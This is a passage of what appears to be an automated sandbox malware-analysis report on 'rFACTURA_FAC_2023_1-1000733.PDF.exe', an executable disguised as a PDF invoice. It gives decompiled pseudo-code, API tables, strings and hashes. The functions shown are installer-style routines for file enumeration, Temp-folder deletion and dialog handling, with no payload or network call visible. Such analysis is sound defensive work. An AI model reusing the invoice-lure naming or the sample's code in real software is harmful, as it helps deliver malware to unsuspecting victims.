								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040625F(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405925(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004052C3(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x7a8ac8 =  *0x7a8ac8 + 1;
										} else {
											E004052C3(0xfffffff1, _t68);
											E00406025(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040596D(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x7a3f28 - 0x5c;
					if( *0x7a3f28 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E004065A2(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405B30(_t68);
							_t38 = E00405925(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004052C3(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004052C3(0xfffffff1, _t68);
							return E00406025(_t67, _t68, 0);
						}
						L30:
						 *0x7a8ac8 =  *0x7a8ac8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405977
0x0040597c
0x00405985
0x00405988
0x00405990
0x00405993
0x00405996
0x0040599e
0x004059a0
0x004059a1
0x00000000
0x004059a1
0x004059ac
0x004059af
0x004059af
0x004059af
0x004059b3
0x004059c6
0x004059cd
0x004059d2
0x004059d6
0x004059e6
0x004059d8
0x004059de
0x004059de
0x004059eb
0x004059ef
0x004059fb
0x00405a01
0x00405a06
0x00405a0c
0x00405a17
0x00405a1d
0x00405a1f
0x00405a22
0x00405acc
0x00405acc
0x00405ad0
0x00405ad2
0x00405ad2
0x00405ad2
0x00405ad2
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a28
0x00405a28
0x00405a28
0x00405a30
0x00405a50
0x00405a58
0x00405a5d
0x00405a64
0x00405a7f
0x00405a84
0x00405a86
0x00405aaa
0x00405a88
0x00405a88
0x00405a8b
0x00405a9f
0x00405a8d
0x00405a90
0x00405a98
0x00405a98
0x00405a8b
0x00405a66
0x00405a6c
0x00405a6e
0x00405a74
0x00405a74
0x00405a6e
0x00000000
0x00405a64
0x00405a32
0x00405a3a
0x00000000
0x00000000
0x00405a3c
0x00405a44
0x00000000
0x00000000
0x00405a46
0x00405a4e
0x00000000
0x00000000
0x00000000
0x00405aaf
0x00405ab7
0x00405abd
0x00405abd
0x00405ac6
0x00000000
0x00405ac6
0x004059f1
0x004059f9
0x00000000
0x00000000
0x00000000
0x004059b5
0x004059b5
0x004059b7
0x00405ad7
0x00405ad9
0x00405adc
0x00405b2d
0x00405b2d
0x00405b2d
0x00405ade
0x00405ae1
0x00405aec
0x00405af1
0x00405af3
0x00000000
0x00000000
0x00405af6
0x00405b02
0x00405b07
0x00405b09
0x00000000
0x00405b24
0x00405b0b
0x00405b0e
0x00000000
0x00000000
0x00405b13
0x00000000
0x00405b1a
0x00405ae3
0x00405ae3
0x00000000
0x00405ae3
0x004059bd
0x004059c0
0x00000000
0x00000000
0x00000000
0x004059c0

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405996
lstrcatW.KERNEL32(007A3F28,\*.*), ref: 004059DE
lstrcatW.KERNEL32(?,0040A014), ref: 00405A01
lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405A07
FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405A17
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AB7
FindClose.KERNEL32(00000000), ref: 00405AC6

Strings

"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe", xrefs: 0040596D
C:\Users\user\AppData\Local\Temp\, xrefs: 0040597B
\*.*, xrefs: 004059D8
(?z, xrefs: 004059C6

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3918519570
Opcode ID: d19359472b600334dec94491de2483d8e144fed62e712032587100ce902314ed
Instruction ID: bed3c70eefbd60b288d0e49403b05a90b1a02306e0e83ed8d7b57435798b36db
Opcode Fuzzy Hash: d19359472b600334dec94491de2483d8e144fed62e712032587100ce902314ed
Instruction Fuzzy Hash: 4341A430900A14AACF21AB65DC89EAF7678EF46724F10827FF406B11D1D77C5981DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 004065A2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065A2(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x7a4f70); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x7a4f70;
			}

0x004065ad
0x004065b6
0x00000000
0x004065c3
0x004065b9
0x00000000

APIs

FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,00405C81,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,?,?,76F93420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76F93420), ref: 004065AD
FindClose.KERNEL32(00000000), ref: 004065B9

Strings

pOz, xrefs: 004065A3
C:\Users\user\AppData\Local\Temp\nsp1D68.tmp, xrefs: 004065A2

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nsp1D68.tmp$pOz
API String ID: 2295610775-407245589
Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
Instruction ID: ff58ffc18adcfb1e82f863fe631525536c8ca60503d441656b10eafe22cb2dbc
Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
Instruction Fuzzy Hash: 40D012315190206FC6005778BD0C84B7A989F463307158B36B466F11E4D7789C668AA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E61
EnableWindow.USER32(00000000,00000000), ref: 00401E6C

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 3ebbc3ab9dadbc117d2673303f8d1b6626c353d20a106f085f8fc62d721b3797
Instruction ID: 8bed64cdced8f5e888a37b1465862a95800e92f45c41cc099ab710eb89ed01f5
Opcode Fuzzy Hash: 3ebbc3ab9dadbc117d2673303f8d1b6626c353d20a106f085f8fc62d721b3797
Instruction Fuzzy Hash: ABE09272E082008FD7549BA5AA4946D77B0EB84354720803FE112F11C1DA7848418F59

Uniqueness

Uniqueness Score: -1.00%

Function 00403D1B Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00403D1B(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t70;
				struct HWND__* _t76;
				signed int _t89;
				struct HWND__* _t94;
				signed int _t102;
				int _t106;
				signed int _t118;
				signed int _t119;
				int _t120;
				signed int _t125;
				struct HWND__* _t128;
				struct HWND__* _t129;
				int _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t145;

				_t118 = _a8;
				if(_t118 == 0x110 || _t118 == 0x408) {
					_t37 = _a12;
					_t128 = _a4;
					__eflags = _t118 - 0x110;
					 *0x7a1f08 = _t37;
					if(_t118 == 0x110) {
						 *0x7a8a28 = _t128;
						 *0x7a1f1c = GetDlgItem(_t128, "true");
						_t94 = GetDlgItem(_t128, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79fee8 = _t94;
						E004041F4(_t128);
						SetClassLongW(_t128, 0xfffffff2,  *0x7a7a08);
						 *0x7a79ec = E0040140B("true");
						_t37 = 1;
						__eflags = 1;
						 *0x7a1f08 = 1;
					}
					_t125 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t125 << 6) +  *0x7a8a60;
					__eflags = _t125;
					if(_t125 < 0) {
						L34:
						E00404240(0x40b);
						while(1) {
							_t39 =  *0x7a1f08;
							 *0x40a368 =  *0x40a368 + _t39;
							_t133 = _t133 + (_t39 << 6);
							_t41 =  *0x40a368; // 0x0
							__eflags = _t41 -  *0x7a8a64;
							if(_t41 ==  *0x7a8a64) {
								E0040140B("true");
							}
							__eflags =  *0x7a79ec - _t136; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a368 -  *0x7a8a64; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t119 =  *(_t133 + 0x14);
							E00406281(_t119, _t128, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004041F4(_t128);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004041F4(_t128);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004041F4(_t128);
							_t51 = GetDlgItem(_t128, 3);
							__eflags =  *0x7a8acc - _t136;
							_v32 = _t51;
							if( *0x7a8acc != _t136) {
								_t119 = _t119 & 0x0000fefd | 0x00000004;
								__eflags = _t119;
							}
							ShowWindow(_t51, _t119 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100); // executed
							E00404216(_t119 & 0x00000002);
							_t120 = _t119 & 0x00000004;
							EnableWindow( *0x79fee8, _t120);
							__eflags = _t120 - _t136;
							if(_t120 == _t136) {
								_push("true");
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, "true");
							__eflags =  *0x7a8acc - _t136;
							if( *0x7a8acc == _t136) {
								_push( *0x7a1f1c);
							} else {
								SendMessageW(_t128, 0x401, 2, _t136);
								_push( *0x79fee8);
							}
							E00404229();
							E0040625F(0x7a1f20, E00403CFC());
							E00406281(0x7a1f20, _t128, _t133,  &(0x7a1f20[lstrlenW(0x7a1f20)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t128, 0x7a1f20); // executed
							_push(_t136);
							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t70;
							if(_t70 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x7a79f8); // executed
									 *0x7a0ef8 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L58;
									}
									_t76 = CreateDialogParamW( *0x7a8a20,  *_t133 +  *0x7a7a00 & 0x0000ffff, _t128,  *(0x40a36c +  *(_t133 + 4) * 4), _t133); // executed
									__eflags = _t76 - _t136;
									 *0x7a79f8 = _t76;
									if(_t76 == _t136) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004041F4(_t76);
									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t128, _t137 + 0x10);
									SetWindowPos( *0x7a79f8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x7a79ec - _t136; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x7a79f8, 8); // executed
									E00404240(0x405);
									goto L58;
								}
								__eflags =  *0x7a8acc - _t136;
								if( *0x7a8acc != _t136) {
									goto L61;
								}
								__eflags =  *0x7a8ac0 - _t136;
								if( *0x7a8ac0 != _t136) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x7a79f8);
						 *0x7a8a28 = _t136;
						EndDialog(_t128,  *0x7a06f0);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t89;
						if(_t89 == 0) {
							goto L33;
						}
						SendMessageW( *0x7a79f8, 0x40f, 0, "true");
						__eflags =  *0x7a79ec - _t136; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t128 = _a4;
					_t136 = 0;
					if(_t118 == 0x47) {
						SetWindowPos( *0x7a1f00, _t128, 0, 0, 0, 0, 0x13);
					}
					if(_t118 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x7a1f00,  ~(_a12 - 1) & _t118);
					}
					if(_t118 != 0x40d) {
						__eflags = _t118 - 0x11;
						if(_t118 != 0x11) {
							__eflags = _t118 - 0x111;
							if(_t118 != 0x111) {
								L26:
								return E0040425B(_t118, _a12, _a16);
							}
							_t135 = _a12 & 0x0000ffff;
							_t129 = GetDlgItem(_t128, _t135);
							__eflags = _t129 - _t136;
							if(_t129 == _t136) {
								L13:
								__eflags = _t135 - 1;
								if(_t135 != 1) {
									__eflags = _t135 - 3;
									if(_t135 != 3) {
										_t130 = 2;
										__eflags = _t135 - _t130;
										if(_t135 != _t130) {
											L25:
											SendMessageW( *0x7a79f8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x7a8acc - _t136;
										if( *0x7a8acc == _t136) {
											_t102 = E0040140B(3);
											__eflags = _t102;
											if(_t102 != 0) {
												goto L26;
											}
											 *0x7a06f0 = 1;
											L21:
											_push(0x78);
											L22:
											E004041CD();
											goto L26;
										}
										E0040140B(_t130);
										 *0x7a06f0 = _t130;
										goto L21;
									}
									__eflags =  *0x40a368 - _t136; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t135);
								goto L22;
							}
							SendMessageW(_t129, 0xf3, _t136, _t136);
							_t106 = IsWindowEnabled(_t129);
							__eflags = _t106;
							if(_t106 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t128, _t136, _t136);
						return 1;
					} else {
						DestroyWindow( *0x7a79f8);
						 *0x7a79f8 = _a12;
						L58:
						if( *0x7a3f20 == _t136) {
							_t145 =  *0x7a79f8 - _t136; // 0x60020
							if(_t145 != 0) {
								ShowWindow(_t128, 0xa); // executed
								 *0x7a3f20 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x00403d24
0x00403d2d
0x00403e6e
0x00403e72
0x00403e76
0x00403e78
0x00403e7d
0x00403e88
0x00403e93
0x00403e98
0x00403e9a
0x00403e9c
0x00403e9f
0x00403ea4
0x00403eb2
0x00403ebf
0x00403ec6
0x00403ec6
0x00403ec7
0x00403ec7
0x00403ecc
0x00403ed2
0x00403ed9
0x00403edf
0x00403ee1
0x00403f21
0x00403f26
0x00403f2b
0x00403f2b
0x00403f30
0x00403f39
0x00403f3b
0x00403f40
0x00403f46
0x00403f4a
0x00403f4a
0x00403f4f
0x00403f55
0x00000000
0x00000000
0x00403f60
0x00403f66
0x00000000
0x00000000
0x00403f6f
0x00403f77
0x00403f7c
0x00403f7f
0x00403f85
0x00403f8a
0x00403f8d
0x00403f93
0x00403f98
0x00403f9b
0x00403fa1
0x00403fa9
0x00403faf
0x00403fb5
0x00403fb9
0x00403fc0
0x00403fc0
0x00403fc0
0x00403fca
0x00403fdc
0x00403fe8
0x00403fed
0x00403ff7
0x00403ffd
0x00403fff
0x00404004
0x00404001
0x00404001
0x00404001
0x00404014
0x0040402c
0x0040402e
0x00404034
0x00404049
0x00404036
0x0040403f
0x00404041
0x00404041
0x0040404f
0x00404060
0x00404076
0x0040407d
0x00404083
0x00404087
0x0040408c
0x0040408e
0x00000000
0x00404094
0x00404094
0x00404096
0x00000000
0x00000000
0x0040409c
0x004040a0
0x004040c5
0x004040cb
0x004040d1
0x004040d3
0x00000000
0x00000000
0x004040f9
0x004040ff
0x00404101
0x00404106
0x00000000
0x00000000
0x0040410c
0x0040410f
0x00404112
0x00404129
0x00404135
0x0040414e
0x00404154
0x00404158
0x0040415d
0x00404163
0x00000000
0x00000000
0x0040416d
0x00404178
0x00000000
0x00404178
0x004040a2
0x004040a8
0x00000000
0x00000000
0x004040ae
0x004040b4
0x00000000
0x00000000
0x00000000
0x004040ba
0x0040408e
0x00404185
0x00404191
0x00404198
0x00000000
0x00403ee3
0x00403ee3
0x00403ee6
0x00403f19
0x00403f19
0x00403f1b
0x00000000
0x00000000
0x00000000
0x00403f1b
0x00403ee8
0x00403eec
0x00403ef1
0x00403ef3
0x00000000
0x00000000
0x00403f03
0x00403f0b
0x00000000
0x00403f11
0x00403d3f
0x00403d3f
0x00403d43
0x00403d48
0x00403d57
0x00403d57
0x00403d60
0x00403d69
0x00403d74
0x00403d74
0x00403d80
0x00403d9c
0x00403d9f
0x00403db2
0x00403db8
0x00403e5b
0x00000000
0x00403e64
0x00403dbe
0x00403dcb
0x00403dcd
0x00403dcf
0x00403dee
0x00403dee
0x00403df1
0x00403df6
0x00403df9
0x00403e09
0x00403e0a
0x00403e0c
0x00403e42
0x00403e55
0x00000000
0x00403e55
0x00403e0e
0x00403e14
0x00403e2d
0x00403e32
0x00403e34
0x00000000
0x00000000
0x00403e36
0x00403e22
0x00403e22
0x00403e24
0x00403e24
0x00000000
0x00403e24
0x00403e17
0x00403e1c
0x00000000
0x00403e1c
0x00403dfb
0x00403e01
0x00000000
0x00000000
0x00403e03
0x00000000
0x00403e03
0x00403df3
0x00000000
0x00403df3
0x00403dd9
0x00403de0
0x00403de6
0x00403de8
0x00000000
0x00000000
0x00000000
0x00403de8
0x00403da4
0x00000000
0x00403d82
0x00403d88
0x00403d92
0x0040419e
0x004041a4
0x004041a6
0x004041ac
0x004041b1
0x004041b7
0x004041b7
0x004041ac
0x004041c1
0x00000000
0x004041c1
0x00403d80

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D57
ShowWindow.USER32(?), ref: 00403D74
DestroyWindow.USER32 ref: 00403D88
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DA4
GetDlgItem.USER32(?,?), ref: 00403DC5
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DD9
IsWindowEnabled.USER32(00000000), ref: 00403DE0
GetDlgItem.USER32(?,?), ref: 00403E8E
GetDlgItem.USER32(?,00000002), ref: 00403E98
SetClassLongW.USER32(?,000000F2,?), ref: 00403EB2
SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403F03
GetDlgItem.USER32(?,00000003), ref: 00403FA9
ShowWindow.USER32(00000000,?), ref: 00403FCA
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FDC
EnableWindow.USER32(?,?), ref: 00403FF7
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040400D
EnableMenuItem.USER32(00000000), ref: 00404014
SendMessageW.USER32(?,000000F4,00000000,?), ref: 0040402C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040403F
lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404069
SetWindowTextW.USER32(?,007A1F20), ref: 0040407D
ShowWindow.USER32(?,0000000A), ref: 004041B1

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 649012c9a47a07fd18c8bc6662fe0bbcc1ec558a86733eef8b886fae08a17129
Instruction ID: e7c2d8670a20ab778e0eeae1551072eac63d4844406393878d1a707f383ade6f
Opcode Fuzzy Hash: 649012c9a47a07fd18c8bc6662fe0bbcc1ec558a86733eef8b886fae08a17129
Instruction Fuzzy Hash: B6C1CDB1504205AFDB206F61ED88E2B3A68EB96705F00853EF651B51F0CB399982DB1E

Uniqueness

Uniqueness Score: -1.00%

Function 0040396D Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0040396D(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				intOrPtr _t41;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x7a8a34;
